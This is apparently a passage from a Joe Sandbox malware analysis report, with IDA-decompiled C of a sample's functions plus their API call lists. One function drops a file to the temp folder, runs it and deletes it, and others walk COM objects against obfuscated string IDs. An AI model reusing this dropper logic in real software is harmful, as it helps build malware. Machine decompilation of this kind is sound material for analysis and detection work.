				if(_t34 != 0) {
					_t48 = _t41 - _t22;
					do {
						 *_t22 = _t34;
						_t34 =  *((intOrPtr*)(_t48 + _t22 + 1));
						_t22 = _t22 + 1;
					} while (_t34 != 0);
				}
				asm("sbb edx, edx");
				 *_t22 = ( ~_a8 & 0xffff0000) + 0x5d385b20;
				_t11 =  &_v2052; // 0x61676571
				E003E03D0(_t11,  &_v1540, _t22 -  &_v1540 + 4);
				_v1024 = 0x696e;
				_v1028 = 0x69676572;
				_t14 =  &_v2052; // 0x61676571
				_t16 =  &_v1028; // 0x69676572
				memcpy( &_v1022, _t14, 0x80 << 2);
				E003E0420(_t16);
				_t18 =  &_v2052; // 0x61676571
				return DeleteFileA(_t18);
			}














    0x003e04bc
    0x003e04d0
    0x003e04d6
    0x003e04d9
    0x003e04db
    0x003e04e6
    0x003e04ee
    0x003e04f2
    0x003e04f4
    0x003e04f4
    0x003e04f6
    0x003e04fa
    0x003e04fb
    0x003e04f4
    0x003e0504
    0x003e0512
    0x003e0523
    0x003e052c
    0x003e0536
    0x003e053d
    0x003e054c
    0x003e0558
    0x003e055e
    0x003e0563
    0x003e0568
    0x003e057b

    APIs
    • memset.MSVCRT ref: 003E04BC
    • GetTempPathA.KERNEL32(00000104,?), ref: 003E04D0
      • Part of subcall function 003E03D0: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,10000080,00000000), ref: 003E03EA
      • Part of subcall function 003E03D0: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 003E0401
      • Part of subcall function 003E03D0: CloseHandle.KERNEL32(00000000), ref: 003E0408
      • Part of subcall function 003E0420: memset.MSVCRT ref: 003E042F
      • Part of subcall function 003E0420: CreateProcessA.KERNEL32(00000000,003E0568,00000000,00000000,00000000,00000010,00000000,00000000,?,?), ref: 003E0468
      • Part of subcall function 003E0420: WaitForSingleObject.KERNEL32(?,00002710), ref: 003E047E
      • Part of subcall function 003E0420: CloseHandle.KERNEL32(?), ref: 003E048E
      • Part of subcall function 003E0420: CloseHandle.KERNEL32(?), ref: 003E0494
    • DeleteFileA.KERNEL32(qega,regi,qega,?,?), ref: 003E056F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C8370, Relevance: 7.8, APIs: 5, Instructions: 285
    C-Code - Quality: 79%
    			E003C8370(void* __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				intOrPtr* _v28;
				char _v228;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t99;
				intOrPtr* _t101;
				intOrPtr* _t102;
				intOrPtr* _t103;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t127;
				intOrPtr _t131;
				intOrPtr* _t132;
				intOrPtr* _t133;
				intOrPtr* _t136;
				intOrPtr* _t139;
				intOrPtr* _t140;
				signed int _t143;
				intOrPtr _t148;
				signed int _t149;
				intOrPtr _t163;
				intOrPtr _t179;
				intOrPtr _t192;
				void* _t206;
				intOrPtr* _t207;
				void* _t209;
				void* _t210;
				void* _t211;

				_t206 = __ecx;
				_t87 =  *((intOrPtr*)(__ecx + 4));
				_v24 = 0;
				_v8 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				if(_t87 != 0) {
					 *((intOrPtr*)(__ecx + 0x30)) = 0;
					 *((intOrPtr*)(__ecx + 0x34)) = 0;
					 *((intOrPtr*)(__ecx + 0x38)) = 0;
					 *((intOrPtr*)(__ecx + 0x3c)) = 0;
					_t89 =  *((intOrPtr*)( *((intOrPtr*)( *_t87 + 0xb4))))(_t87,  &_v24, _t207);
					__eflags = _t89;
					if(_t89 < 0) {
						L30:
						_t90 = _v20;
					} else {
						_t99 = _v24;
						_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0x34))))(_t99,  &_v8);
						__eflags = _t101;
						if(_t101 < 0) {
							goto L30;
						} else {
							__eflags = _t101 - 1;
							if(_t101 == 1) {
								_t90 = _v20;
								_v28 = 1;
							} else {
								while(1) {
									_t102 = _v12;
									__eflags = _t102;
									if(_t102 != 0) {
										__imp__#6(_t102);
									}
									_t103 = _v16;
									_v12 = 0;
									__eflags = _t103;
									if(_t103 != 0) {
										__imp__#6(_t103);
									}
									_t104 = _v8;
									_v16 = 0;
									_t106 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0xa4))))(_t104,  &_v12);
									__eflags = _t106;
									if(_t106 < 0) {
										goto L30;
									}
									_t107 = _v8;
									__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t107 + 0x68))))(_t107,  &_v16);
									if(__eflags < 0) {
										goto L30;
									} else {
										E003C9090(__eflags,  &_v228, 0x75);
										_t163 =  *0x3e8628; // 0x622508
										_t210 = _t209 + 8;
										__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 0xe0))))(_v12,  &_v228);
										if(__eflags != 0) {
											E003C9090(__eflags,  &_v228, 0x77);
											_t192 =  *0x3e8628; // 0x622508
											_t211 = _t210 + 8;
											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t192 + 0xe0))))(_v12,  &_v228);
											if(__eflags != 0) {
												E003C9090(__eflags,  &_v228, 0x78);
												_t119 =  *0x3e8628; // 0x622508
												_t209 = _t211 + 8;
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t119 + 0xe0))))(_v12,  &_v228);
												if(__eflags != 0) {
													E003C9090(__eflags,  &_v228, 0x79);
													_t123 =  *0x3e8628; // 0x622508
													_t209 = _t209 + 8;
													__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0xe0))))(_v12,  &_v228);
													if(__eflags != 0) {
														E003C9090(__eflags,  &_v228, 0x7a);
														_t127 =  *0x3e8628; // 0x622508
														_t209 = _t209 + 8;
														__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0xe0))))(_v12,  &_v228);
														if(__eflags != 0) {
															E003C9090(__eflags,  &_v228, 0x7b);
															_t131 =  *0x3e8628; // 0x622508
															_t209 = _t209 + 8;
															_t132 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xe0))))(_v12,  &_v228);
															__eflags = _t132;
															if(_t132 != 0) {
																goto L26;
															} else {
																_t139 = E003C3070(0, _t206, _t206, _t207, _v8);
																goto L25;
															}
														} else {
															_t139 = E003C2220(_t206, _t206, _t207, _v8);
															goto L25;
														}
													} else {
														_t139 = E003C53E0(_t206, _t206, _t207, _v8);
														L25:
														__eflags = _t139;
														if(_t139 == 0) {
															goto L30;
														} else {
															goto L26;
														}
													}
												} else {
													_t140 =  *((intOrPtr*)(_t206 + 0x2c));
													__eflags = _t140;
													if(_t140 != 0) {
														_t140 = E003CBB40(_t140);
														_t209 = _t209 + 4;
													}
													__imp__#2(_v16);
													 *((intOrPtr*)(_t206 + 0x2c)) = _t140;
													goto L26;
												}
											} else {
												E003C9090(__eflags,  &_v228, 0x76);
												_t179 =  *0x3e8628; // 0x622508
												_t209 = _t211 + 8;
												_t143 =  *((intOrPtr*)( *((intOrPtr*)(_t179 + 0xe0))))(_v16,  &_v228);
												asm("sbb eax, eax");
												 *((intOrPtr*)(_t206 + 0x18)) =  ~_t143 + 1;
												goto L26;
											}
										} else {
											E003C9090(__eflags,  &_v228, 0x76);
											_t148 =  *0x3e8628; // 0x622508
											_t209 = _t210 + 8;
											_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t148 + 0xe0))))(_v16,  &_v228);
											asm("sbb eax, eax");
											 *((intOrPtr*)(_t206 + 0x14)) =  ~_t149 + 1;
											L26:
											_t133 = _v8;
											_t207 =  *((intOrPtr*)( *((intOrPtr*)( *_t133 + 0x40))))(_t133,  &_v20);
											__eflags = _t207;
											if(_t207 < 0) {
												goto L30;
											} else {
												_t136 = _v8;
												 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 8))))(_t136);
												_v8 = _v20;
												_t90 = 0;
												_v20 = 0;
												__eflags = _t207 - 1;
												if(_t207 != 1) {
													continue;
												} else {
													_v28 = _t207;
												}
											}
										}
									}
									goto L31;
								}
								goto L30;
							}
						}
					}
					L31:
					__eflags = _t90;
					if(_t90 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t90 + 8))))(_t90);
					}
					_t91 = _v16;
					__eflags = _t91;
					if(_t91 != 0) {
						__imp__#6(_t91);
					}
					_t92 = _v12;
					__eflags = _t92;
					if(_t92 != 0) {
						__imp__#6(_t92);
					}
					_t93 = _v8;
					__eflags = _t93;
					if(_t93 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t93 + 8))))(_t93);
					}
					_t94 = _v24;
					__eflags = _t94;
					if(_t94 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t94 + 8))))(_t94);
					}
					return _v28;
				} else {
					return 0;
				}
			}















































    0x003c837d
    0x003c837f
    0x003c8382
    0x003c8385
    0x003c8388
    0x003c838b
    0x003c838e
    0x003c8391
    0x003c8396
    0x003c83a4
    0x003c83a7
    0x003c83aa
    0x003c83ad
    0x003c83ba
    0x003c83bc
    0x003c83be
    0x003c8644
    0x003c8644
    0x003c83c4
    0x003c83c4
    0x003c83d1
    0x003c83d3
    0x003c83d5
    0x00000000
    0x003c83db
    0x003c83db
    0x003c83de
    0x003c8638
    0x003c863b
    0x003c83e4
    0x003c83e4
    0x003c83e4
    0x003c83e7
    0x003c83e9
    0x003c83ec
    0x003c83ec
    0x003c83f2
    0x003c83f5
    0x003c83f8
    0x003c83fa
    0x003c83fd
    0x003c83fd
    0x003c8403
    0x003c8409
    0x003c8416
    0x003c8418
    0x003c841a
    0x00000000
    0x00000000
    0x003c8420
    0x003c842f
    0x003c8431
    0x00000000
    0x003c8437
    0x003c8440
    0x003c8448
    0x003c844e
    0x003c8461
    0x003c8463
    0x003c84a4
    0x003c84ac
    0x003c84b2
    0x003c84c5
    0x003c84c7
    0x003c8509
    0x003c8511
    0x003c8516
    0x003c8529
    0x003c852b
    0x003c8558
    0x003c8560
    0x003c8565
    0x003c8578
    0x003c857a
    0x003c8592
    0x003c859a
    0x003c859f
    0x003c85b2
    0x003c85b4
    0x003c85cc
    0x003c85d4
    0x003c85d9
    0x003c85ea
    0x003c85ec
    0x003c85ee
    0x00000000
    0x003c85f0
    0x003c85f6
    0x00000000
    0x003c85f6
    0x003c85b6
    0x003c85bc
    0x00000000
    0x003c85bc
    0x003c857c
    0x003c8582
    0x003c85fb
    0x003c85fb
    0x003c85fd
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003c85fd
    0x003c852d
    0x003c852d
    0x003c8530
    0x003c8532
    0x003c8535
    0x003c853a
    0x003c853a
    0x003c8541
    0x003c8547
    0x00000000
    0x003c8547
    0x003c84c9
    0x003c84d2
    0x003c84da
    0x003c84e0
    0x003c84f1
    0x003c84f5
    0x003c84f8
    0x00000000
    0x003c84f8
    0x003c8465
    0x003c846e
    0x003c8476
    0x003c847b
    0x003c848c
    0x003c8490
    0x003c8493
    0x003c85ff
    0x003c85ff
    0x003c860e
    0x003c8610
    0x003c8612
    0x00000000
    0x003c8614
    0x003c8614
    0x003c861d
    0x003c8622
    0x003c8625
    0x003c8627
    0x003c862a
    0x003c862d
    0x00000000
    0x003c8633
    0x003c8633
    0x003c8633
    0x003c862d
    0x003c8612
    0x003c8463
    0x00000000
    0x003c8431
    0x00000000
    0x003c83e4
    0x003c83de
    0x003c83d5
    0x003c8647
    0x003c8648
    0x003c864a
    0x003c8652
    0x003c8652
    0x003c8654
    0x003c8657
    0x003c8659
    0x003c865c
    0x003c865c
    0x003c8662
    0x003c8665
    0x003c8667
    0x003c866a
    0x003c866a
    0x003c8670
    0x003c8673
    0x003c8675
    0x003c867d
    0x003c867d
    0x003c867f
    0x003c8682
    0x003c8684
    0x003c868c
    0x003c868c
    0x003c8696
    0x003c8399
    0x003c839f
    0x003c839f

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003C83EC
    • SysAllocString.OLEAUT32(?), ref: 003C8541
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • SysFreeString.OLEAUT32(?), ref: 003C83FD
      • Part of subcall function 003C3070: SysFreeString.OLEAUT32(?), ref: 003C30C8
      • Part of subcall function 003C3070: SysFreeString.OLEAUT32(?), ref: 003C30DD
      • Part of subcall function 003C3070: SysFreeString.OLEAUT32(?), ref: 003C3240
      • Part of subcall function 003C3070: SysFreeString.OLEAUT32(?), ref: 003C324E
      • Part of subcall function 003C2220: SysFreeString.OLEAUT32(?), ref: 003C22D8
      • Part of subcall function 003C2220: SysFreeString.OLEAUT32(?), ref: 003C23DB
      • Part of subcall function 003C53E0: SysFreeString.OLEAUT32(?), ref: 003C549E
      • Part of subcall function 003C53E0: SysFreeString.OLEAUT32(?), ref: 003C54AF
      • Part of subcall function 003C53E0: _wtoi.MSVCRT ref: 003C55BB
      • Part of subcall function 003C53E0: SysFreeString.OLEAUT32(?), ref: 003C5605
      • Part of subcall function 003C53E0: SysFreeString.OLEAUT32(?), ref: 003C5613
    • SysFreeString.OLEAUT32(?), ref: 003C865C
    • SysFreeString.OLEAUT32(?), ref: 003C866A
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C32C0, Relevance: 7.7, APIs: 5, Instructions: 229
    C-Code - Quality: 69%
    			E003C32C0(void* _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				void* _v16;
				char _v20;
				void* _v24;
				void* _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v52;
				char _v252;
				intOrPtr* _t91;
				intOrPtr _t94;
				intOrPtr* _t95;
				intOrPtr _t98;
				intOrPtr* _t100;
				intOrPtr* _t103;
				intOrPtr* _t107;
				intOrPtr _t108;
				intOrPtr* _t110;
				intOrPtr _t112;
				intOrPtr* _t113;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t119;
				intOrPtr* _t121;
				intOrPtr _t123;
				intOrPtr* _t124;
				intOrPtr _t125;
				intOrPtr* _t126;
				intOrPtr _t134;
				intOrPtr* _t135;
				char _t138;
				intOrPtr _t150;
				intOrPtr _t156;
				intOrPtr _t163;
				intOrPtr* _t172;
				intOrPtr* _t177;
				intOrPtr _t183;
				intOrPtr _t187;
				intOrPtr _t188;
				intOrPtr* _t189;
				intOrPtr* _t194;

				_t189 = _a4;
				_push( &_v24);
				_push(1);
				_t138 = 0;
				_push(_t189);
				_v12 = 0;
				_v24 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *_t189 + 0x38))))() >= 0) {
					_t91 = _v24;
					_v32 = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x1c))))(_t91,  &_v32);
					_t94 = 0;
					__eflags = _v32;
					if(_v32 > 0) {
						do {
							_t177 = _v24;
							_t12 = _t94 + 1; // 0x1
							_t188 = _t12;
							_v28 = _t138;
							_v52 = 3;
							_t194 = _t194 - 0x10;
							_t118 = _t194;
							 *_t118 = _v52;
							_t156 = _t188;
							_v44 = _t156;
							 *((intOrPtr*)(_t118 + 4)) = _v48;
							 *((intOrPtr*)(_t118 + 8)) = _t156;
							 *((intOrPtr*)(_t118 + 0xc)) = _v40;
							_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t177 + 0x20))))(_t177,  &_v28);
							__imp__#9( &_v52);
							_t138 = 0;
							__eflags = _t119;
							if(_t119 >= 0) {
								_t121 = _v28;
								_v20 = 0;
								_t123 =  *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0x1c))))(_t121,  &_v20);
								__eflags = _t123;
								if(_t123 >= 0) {
									__imp__#6(_v20);
								}
								_t124 = _v28;
								_v8 = _t138;
								_t125 =  *((intOrPtr*)( *((intOrPtr*)( *_t124 + 0x50))))(_t124,  &_v8);
								__eflags = _t125;
								if(_t125 >= 0) {
									_t183 =  *0x3e8628; // 0x622508
									__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t183 + 0x1e0))))(_v8, _a8);
									if(__eflags != 0) {
										E003C9090(__eflags,  &_v252, 0x24);
										_t163 =  *0x3e8628; // 0x622508
										_t194 = _t194 + 8;
										_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t163 + 8))))(_v20,  &_v252);
										__eflags = _t134;
										if(_t134 == 0) {
											_t44 =  &_v12;
											 *_t44 = _v12 + 1;
											__eflags =  *_t44;
										} else {
											_t135 = _a4;
											 *((intOrPtr*)( *((intOrPtr*)( *_t135 + 0x3c))))(_t135, _v20, _t138);
										}
									}
									__imp__#6(_v8);
								}
								_t126 = _v28;
								 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 8))))(_t126);
							}
							_t94 = _t188;
							__eflags = _t94 - _v32;
						} while (_t94 < _v32);
						_t189 = _a4;
					}
					_t95 = _v24;
					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 8))))(_t95);
					_v16 = _t138;
					_t98 =  *((intOrPtr*)( *((intOrPtr*)( *_t189 + 0x28))))(_t189, _t138,  &_v16);
					__eflags = _t98;
					if(_t98 < 0) {
						goto L1;
					} else {
						_t100 = _v16;
						_v36 = _t138;
						 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x1c))))(_t100,  &_v36);
						_t187 = 0;
						__eflags = _v36 - _t138;
						if(_v36 > _t138) {
							do {
								_t172 = _v16;
								_a4 = _t138;
								_v52 = 3;
								_t194 = _t194 - 0x10;
								_t107 = _t194;
								 *_t107 = _v52;
								_t187 = _t187 + 1;
								_t150 = _t187;
								_v44 = _t150;
								 *((intOrPtr*)(_t107 + 4)) = _v48;
								 *((intOrPtr*)(_t107 + 8)) = _t150;
								 *((intOrPtr*)(_t107 + 0xc)) = _v40;
								_t108 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x20))))(_t172,  &_a4);
								__imp__#9( &_v52);
								_t138 = 0;
								__eflags = _t108;
								if(_t108 >= 0) {
									_t110 = _a4;
									_v8 = 0;
									_t112 =  *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x1c))))(_t110,  &_v8);
									__eflags = _t112;
									if(_t112 >= 0) {
										__imp__#6(_v8);
										_t116 = E003C32C0(_a4, _a8);
										_t194 = _t194 + 8;
										_t81 =  &_v12;
										 *_t81 = _v12 + _t116;
										__eflags =  *_t81;
									}
									_t113 = _a4;
									 *((intOrPtr*)( *((intOrPtr*)( *_t113 + 8))))(_t113);
								}
								__eflags = _t187 - _v36;
							} while (_t187 < _v36);
						}
						_t103 = _v16;
						 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))(_t103);
						return _v12;
					}
				} else {
					L1:
					return 0;
				}
			}
















































    0x003c32cb
    0x003c32d7
    0x003c32d8
    0x003c32da
    0x003c32dc
    0x003c32dd
    0x003c32e0
    0x003c32e7
    0x003c32f2
    0x003c32f8
    0x003c3302
    0x003c3304
    0x003c3306
    0x003c3309
    0x003c3310
    0x003c3310
    0x003c3313
    0x003c3313
    0x003c331a
    0x003c3322
    0x003c3329
    0x003c332c
    0x003c332e
    0x003c3333
    0x003c3335
    0x003c333a
    0x003c333d
    0x003c3347
    0x003c334a
    0x003c3352
    0x003c3358
    0x003c335a
    0x003c335c
    0x003c3362
    0x003c3368
    0x003c3372
    0x003c3374
    0x003c3376
    0x003c337c
    0x003c337c
    0x003c3382
    0x003c3388
    0x003c3392
    0x003c3394
    0x003c3396
    0x003c339e
    0x003c33ae
    0x003c33b0
    0x003c33bb
    0x003c33c3
    0x003c33c9
    0x003c33d7
    0x003c33d9
    0x003c33db
    0x003c33ef
    0x003c33ef
    0x003c33ef
    0x003c33dd
    0x003c33dd
    0x003c33eb
    0x003c33eb
    0x003c33db
    0x003c33f6
    0x003c33f6
    0x003c33fc
    0x003c3405
    0x003c3405
    0x003c3407
    0x003c3409
    0x003c3409
    0x003c3412
    0x003c3412
    0x003c3415
    0x003c341e
    0x003c342b
    0x003c342e
    0x003c3430
    0x003c3432
    0x00000000
    0x003c3438
    0x003c3438
    0x003c343e
    0x003c3448
    0x003c344a
    0x003c344c
    0x003c344f
    0x003c3455
    0x003c3455
    0x003c345c
    0x003c3464
    0x003c346b
    0x003c346e
    0x003c3470
    0x003c3475
    0x003c3476
    0x003c3478
    0x003c347d
    0x003c3480
    0x003c348a
    0x003c348d
    0x003c3495
    0x003c349b
    0x003c349d
    0x003c349f
    0x003c34a1
    0x003c34a7
    0x003c34b1
    0x003c34b3
    0x003c34b5
    0x003c34bb
    0x003c34c9
    0x003c34ce
    0x003c34d1
    0x003c34d1
    0x003c34d1
    0x003c34d1
    0x003c34d4
    0x003c34dd
    0x003c34dd
    0x003c34df
    0x003c34df
    0x003c3455
    0x003c34e8
    0x003c34f1
    0x003c34fc
    0x003c34fc
    0x003c32e9
    0x003c32e9
    0x003c32f1
    0x003c32f1

    APIs
    • VariantClear.OLEAUT32(?), ref: 003C3495
    • SysFreeString.OLEAUT32(?), ref: 003C34BB
      • Part of subcall function 003C32C0: VariantClear.OLEAUT32(?), ref: 003C3352
      • Part of subcall function 003C32C0: SysFreeString.OLEAUT32(003C62AB), ref: 003C337C
      • Part of subcall function 003C32C0: SysFreeString.OLEAUT32(?), ref: 003C33F6
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C53E0, Relevance: 7.7, APIs: 5, Instructions: 213
    C-Code - Quality: 63%
    			E003C53E0(intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				signed int _v20;
				void* _v24;
				signed int _v28;
				char _v36;
				signed int _v40;
				short _v44;
				intOrPtr _v48;
				char _v248;
				void* __ebx;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t90;
				intOrPtr _t94;
				char _t95;
				char _t96;
				intOrPtr* _t97;
				intOrPtr* _t99;
				void* _t101;
				intOrPtr* _t105;
				void* _t110;
				void* _t113;
				void* _t116;
				intOrPtr _t119;
				void* _t122;
				intOrPtr _t140;
				intOrPtr _t166;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				void* _t173;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;

				_t166 = __ecx;
				_v48 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v40 = 0;
				_v8 = 0;
				_v28 = 0;
				_v24 = 0;
				_v44 = 0;
				E003CBB30( &_v36);
				E003C5230(__ecx, __ecx);
				_t170 = _a4;
				_push( &_v44);
				_push(_t170);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t170 + 0x58))))() >= 0) {
					if(_v44 != 0xffff) {
						L21:
						_v28 = 1;
						 *((intOrPtr*)(_t166 + 0x20)) = _v20;
						 *((intOrPtr*)(_t166 + 0x28)) = _v40;
					} else {
						_push( &_v24);
						_push(_t170);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t170 + 0x30))))() >= 0) {
							_t90 = _v24;
							_push( &_v20);
							_push(_t90);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t90 + 0x20))))() >= 0) {
								_t94 = E003D1D90(_v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2 + _v20 + _v20 * 2, 0);
								_t174 = _t173 + 8;
								_v40 = _t94;
								if(_t94 != 0) {
									_t168 = 0;
									if(_v20 <= 0) {
										L20:
										_t166 = _v48;
										goto L21;
									} else {
										_t25 = _t94 + 8; // 0x8
										_t172 = _t25;
										while(1) {
											_t95 = _v12;
											if(_t95 != 0) {
												__imp__#6(_t95);
											}
											_t96 = _v16;
											_v12 = 0;
											if(_t96 != 0) {
												__imp__#6(_t96);
											}
											_t97 = _v24;
											_push( &_v8);
											_v16 = 0;
											_push(_t168);
											_push(_t97);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t97 + 0x1c))))() < 0) {
												goto L22;
											}
											_t99 = _v8;
											_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_t99 + 0xa4))))(_t99,  &_v12);
											_t187 = _t101;
											if(_t101 >= 0) {
												E003C9090(_t187,  &_v248, 0x7e);
												_t140 =  *0x3e8628; // 0x622508
												_t174 = _t174 + 8;
												_push( &_v248);
												_push(_v12);
												if( *((intOrPtr*)( *((intOrPtr*)(_t140 + 0xe0))))() != 0) {
													L19:
													_t105 = _v8;
													 *((intOrPtr*)( *((intOrPtr*)( *_t105 + 8))))(_t105);
													_t168 = _t168 + 1;
													_t172 = _t172 + 0x18;
													_v8 = 0;
													if(_t168 < _v20) {
														continue;
													} else {
														goto L20;
													}
												} else {
													E003CB1E0(0,  &_v36);
													_t110 = E003CA140( &_v36, _v8);
													_t189 = _t110;
													if(_t110 != 0) {
														E003C9090(_t189,  &_v248, 0x27);
														_t175 = _t174 + 8;
														_t44 = _t172 - 8; // 0x0
														_t113 = E003C1A10( &_v36,  &_v248, _t44);
														_t190 = _t113;
														if(_t113 != 0) {
															E003C9090(_t190,  &_v248, 0x7f);
															_t176 = _t175 + 8;
															_t48 = _t172 - 4; // 0x4
															_t116 = E003C1A10( &_v36,  &_v248, _t48);
															_t191 = _t116;
															if(_t116 != 0) {
																E003C9090(_t191,  &_v248, 0x80);
																_t177 = _t176 + 8;
																_t119 = E003C1A10( &_v36,  &_v248,  &_v16);
																if(_t119 != 0) {
																	__imp___wtoi(_v16);
																	_t174 = _t177 + 4;
																	 *_t172 = _t119;
																	 *((intOrPtr*)(_t172 + 8)) = 0;
																	 *((intOrPtr*)(_t172 + 0xc)) = 0;
																	goto L19;
																}
															}
														}
													}
												}
											}
											goto L22;
										}
									}
								}
							}
						}
					}
				}
				L22:
				_t80 = _v12;
				if(_t80 != 0) {
					__imp__#6(_t80);
				}
				_t81 = _v16;
				if(_t81 != 0) {
					__imp__#6(_t81);
				}
				_t82 = _v8;
				if(_t82 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t82 + 8))))(_t82);
				}
				_t83 = _v24;
				_pop(_t122);
				if(_t83 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t83 + 8))))(_t83);
				}
				L003C26B0(_t122,  &_v36);
				return _v28;
			}










































    0x003c53ee
    0x003c53f3
    0x003c53f6
    0x003c53f9
    0x003c53fc
    0x003c53ff
    0x003c5402
    0x003c5405
    0x003c5408
    0x003c540b
    0x003c540e
    0x003c5415
    0x003c541a
    0x003c5425
    0x003c5426
    0x003c542b
    0x003c5436
    0x003c55ea
    0x003c55f0
    0x003c55f7
    0x003c55fa
    0x003c543c
    0x003c5444
    0x003c5445
    0x003c544a
    0x003c5450
    0x003c5458
    0x003c5459
    0x003c5461
    0x003c5475
    0x003c547a
    0x003c547d
    0x003c5482
    0x003c5488
    0x003c548d
    0x003c55e7
    0x003c55e7
    0x00000000
    0x003c5493
    0x003c5493
    0x003c5493
    0x003c5496
    0x003c5496
    0x003c549b
    0x003c549e
    0x003c549e
    0x003c54a4
    0x003c54a7
    0x003c54ac
    0x003c54af
    0x003c54af
    0x003c54b5
    0x003c54bb
    0x003c54bc
    0x003c54c4
    0x003c54c5
    0x003c54ca
    0x00000000
    0x00000000
    0x003c54d0
    0x003c54e0
    0x003c54e2
    0x003c54e4
    0x003c54f3
    0x003c54fb
    0x003c5501
    0x003c550a
    0x003c5511
    0x003c5516
    0x003c55cc
    0x003c55cc
    0x003c55d5
    0x003c55d7
    0x003c55d8
    0x003c55db
    0x003c55e1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003c551c
    0x003c551f
    0x003c552b
    0x003c5530
    0x003c5532
    0x003c5541
    0x003c5546
    0x003c5549
    0x003c5557
    0x003c555c
    0x003c555e
    0x003c556d
    0x003c5572
    0x003c5575
    0x003c5583
    0x003c5588
    0x003c558a
    0x003c5598
    0x003c559d
    0x003c55ae
    0x003c55b5
    0x003c55bb
    0x003c55c1
    0x003c55c4
    0x003c55c6
    0x003c55c9
    0x00000000
    0x003c55c9
    0x003c55b5
    0x003c558a
    0x003c555e
    0x003c5532
    0x003c5516
    0x00000000
    0x003c54e4
    0x003c5496
    0x003c548d
    0x003c5482
    0x003c5461
    0x003c544a
    0x003c5436
